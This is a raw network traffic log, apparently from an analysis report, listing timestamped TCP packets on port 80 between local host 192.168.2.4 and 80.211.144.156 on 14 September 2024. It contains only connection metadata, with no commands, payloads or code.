                                                    Sep 14, 2024 12:53:14.782272100 CEST6277080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:14.787657976 CEST806277080.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:14.787761927 CEST6277080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:15.330225945 CEST6276980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:15.330972910 CEST6277180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:15.335777998 CEST806276980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:15.335851908 CEST806277180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:15.335853100 CEST6276980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:15.335928917 CEST6277180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:15.336014986 CEST6277180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:15.341768026 CEST806277180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:15.681031942 CEST6277180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:15.685930014 CEST806277180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:16.001389027 CEST806277180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:16.102998018 CEST6277180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:16.128463030 CEST806277180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:16.212300062 CEST6277180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:16.549751997 CEST6277180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:16.550343037 CEST6277380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:16.554903984 CEST806277180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:16.555227995 CEST806277380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:16.555316925 CEST6277180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:16.555321932 CEST6277380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:16.555443048 CEST6277380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:16.560266972 CEST806277380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:16.903414011 CEST6277380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:16.908879042 CEST806277380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:17.239284992 CEST806277380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:17.372342110 CEST806277380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:17.372414112 CEST6277380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:18.006936073 CEST6277380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:18.081490993 CEST806277380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:18.081562996 CEST6277380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:18.151572943 CEST6277480192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:18.156408072 CEST806277480.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:18.156487942 CEST6277480192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:18.156620979 CEST6277480192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:18.161421061 CEST806277480.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:18.509180069 CEST6277480192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:18.514071941 CEST806277480.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:18.840773106 CEST806277480.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:18.915371895 CEST6277480192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:18.972451925 CEST806277480.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:19.102852106 CEST6277480192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:19.494124889 CEST6277480192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:19.494657040 CEST6277680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:19.499476910 CEST806277480.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:19.499550104 CEST6277480192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:19.499581099 CEST806277680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:19.499655008 CEST6277680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:19.499731064 CEST6277680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:19.504642010 CEST806277680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:19.853044987 CEST6277680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:19.858087063 CEST806277680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:19.858145952 CEST806277680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:20.165491104 CEST806277680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:20.212265015 CEST6277680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:20.365091085 CEST806277680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:20.509131908 CEST6277680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:21.178113937 CEST6277680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:21.178503990 CEST6277780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:21.245361090 CEST806277780.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:21.245461941 CEST6277780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:21.245578051 CEST6277780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:21.246093988 CEST806277680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:21.246164083 CEST6277680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:21.251367092 CEST806277780.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:21.602936983 CEST6277780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:21.608190060 CEST806277780.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:21.913300991 CEST806277780.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:22.044972897 CEST806277780.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:22.045052052 CEST6277780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:23.922367096 CEST6277780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:23.923399925 CEST6277880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:23.927603960 CEST806277780.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:23.927665949 CEST6277780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:23.928286076 CEST806277880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:23.928366899 CEST6277880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:23.928507090 CEST6277880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:23.933331966 CEST806277880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:24.275871992 CEST6277880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:24.280925035 CEST806277880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:24.594178915 CEST806277880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:24.724431038 CEST806277880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:24.724538088 CEST6277880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:24.866014004 CEST6277880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:24.866631985 CEST6277980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:24.871251106 CEST806277880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:24.871366024 CEST6277880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:24.871474028 CEST806277980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:24.871620893 CEST6277980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:24.871753931 CEST6277980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:24.876502037 CEST806277980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:25.227947950 CEST6277980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:25.232871056 CEST806277980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:25.538723946 CEST806277980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:25.674169064 CEST806277980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:25.674233913 CEST6277980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:25.808995008 CEST6277980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:25.810678005 CEST6278080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:25.815422058 CEST806277980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:25.815495968 CEST6277980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:25.816715002 CEST806278080.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:25.816791058 CEST6278080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:25.816932917 CEST6278080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:25.821794033 CEST806278080.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:25.836963892 CEST6278180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:25.841773987 CEST806278180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:25.842442036 CEST6278180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:25.842598915 CEST6278180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:25.847373009 CEST806278180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:26.172389984 CEST6278080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:26.177521944 CEST806278080.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:26.177546024 CEST806278080.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:26.196747065 CEST6278180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:26.201738119 CEST806278180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:26.503853083 CEST806278180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:26.508223057 CEST806278080.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:26.571652889 CEST6278080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:26.602912903 CEST6278180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:26.631611109 CEST806278180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:26.632370949 CEST6278080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:26.637624025 CEST806278080.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:26.637691975 CEST6278080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:26.712265968 CEST6278180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:27.084197044 CEST6278180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:27.085550070 CEST6278280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:27.089354038 CEST806278180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:27.090023994 CEST6278180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:27.090464115 CEST806278280.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:27.090588093 CEST6278280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:27.090694904 CEST6278280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:27.095493078 CEST806278280.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:27.446721077 CEST6278280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:27.451592922 CEST806278280.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:27.758785009 CEST806278280.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:27.837310076 CEST6278280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:27.889146090 CEST806278280.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:27.989172935 CEST6278280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:28.010308981 CEST6278280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:28.010962963 CEST6278380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:28.015646935 CEST806278280.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:28.015717983 CEST6278280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:28.016022921 CEST806278380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:28.016100883 CEST6278380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:28.016199112 CEST6278380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:28.021051884 CEST806278380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:28.368666887 CEST6278380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:28.373908043 CEST806278380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:28.684290886 CEST806278380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:28.759160995 CEST6278380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:28.883975983 CEST806278380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:29.071430922 CEST6278380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:29.076849937 CEST806278380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:29.079514980 CEST6278380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:29.080257893 CEST6278480192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:29.085175037 CEST806278480.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:29.085273027 CEST6278480192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:29.085387945 CEST6278480192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:29.090143919 CEST806278480.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:29.431091070 CEST6278480192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:29.436153889 CEST806278480.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:29.778774977 CEST806278480.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:29.826992035 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:29.827303886 CEST6278480192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:29.834450006 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:29.834522009 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:29.834629059 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:29.835642099 CEST806278480.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:29.835746050 CEST6278480192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:29.839823961 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.037081957 CEST6278680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.041982889 CEST806278680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.043411970 CEST6278680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.043514013 CEST6278680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.048280954 CEST806278680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.181233883 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.186120987 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.186134100 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.186145067 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.186187983 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.186211109 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.186230898 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.186252117 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.186316013 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.186325073 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.186369896 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.186399937 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.186408043 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.186415911 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.186445951 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.186460972 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.186500072 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.191104889 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.191114902 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.191162109 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.191170931 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.191173077 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.191210032 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.191216946 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.191220045 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.191260099 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.191272974 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.238008022 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.240377903 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.285547018 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.287765026 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.319597960 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.320391893 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.325710058 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.325728893 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.325786114 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.325829029 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.325839043 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.325846910 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.325855970 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.325900078 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.325956106 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.325965881 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.325973988 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.325983047 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.326004028 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.326006889 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.326019049 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.326047897 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.326543093 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.326553106 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.326561928 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.326570988 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.326581001 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.326590061 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.326598883 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.326607943 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.326616049 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.326617002 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.326626062 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.326634884 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.326644897 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.326653004 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.326673985 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.326702118 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.330643892 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.330986023 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.330996990 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.331024885 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.331052065 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.331445932 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.331546068 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.331594944 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.331630945 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.331676006 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.331743002 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.331774950 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.331815958 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.331825972 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.332112074 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.332417965 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.332449913 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.332453012 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.332467079 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.332479000 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.332514048 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.332523108 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.332604885 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.332613945 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.332693100 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.332701921 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.332755089 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.332763910 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.332844973 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.332854033 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.332894087 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.332902908 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.335913897 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.335926056 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.335968018 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.336024046 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.336184025 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.336193085 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.399857998 CEST6278680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.405256033 CEST806278680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.528381109 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.602902889 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.713251114 CEST806278680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.840540886 CEST806278680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.840614080 CEST6278680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.959345102 CEST6278680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.960216999 CEST6278780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.964644909 CEST806278680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.964721918 CEST6278680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.965234041 CEST806278780.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:30.965312004 CEST6278780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.965416908 CEST6278780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:30.970308065 CEST806278780.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:31.270220041 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:31.321805954 CEST6278780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:31.326853991 CEST806278780.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:31.415419102 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:31.634633064 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:31.635320902 CEST6278880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:31.636471987 CEST806278780.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:31.639940977 CEST806278580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:31.640012026 CEST6278580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:31.640325069 CEST806278880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:31.640398026 CEST6278880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:31.640510082 CEST6278880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:31.645250082 CEST806278880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:31.759190083 CEST6278780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:31.768908024 CEST806278780.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:31.868536949 CEST6278780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:31.897273064 CEST6278780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:31.898127079 CEST6278980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:31.902399063 CEST806278780.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:31.902487993 CEST6278780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:31.902991056 CEST806278980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:31.903084040 CEST6278980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:31.903327942 CEST6278980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:31.908087969 CEST806278980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:31.993634939 CEST6278880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:32.002269030 CEST806278880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:32.002353907 CEST806278880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:32.259241104 CEST6278980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:32.265127897 CEST806278980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:32.336026907 CEST806278880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:32.392193079 CEST6278880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:32.529690027 CEST806278880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:32.591936111 CEST806278980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:32.712299109 CEST6278880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:32.724231005 CEST806278980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:32.724497080 CEST6278980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:32.852173090 CEST6278880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:32.852243900 CEST6278980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:32.857273102 CEST806278880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:32.857624054 CEST806278980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:32.857692003 CEST6278880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:32.857804060 CEST6278980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:33.001956940 CEST6279080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:33.006823063 CEST806279080.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:53:33.008337975 CEST6279080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:53:33.008498907 CEST6279080192.168.2.480.211.144.156
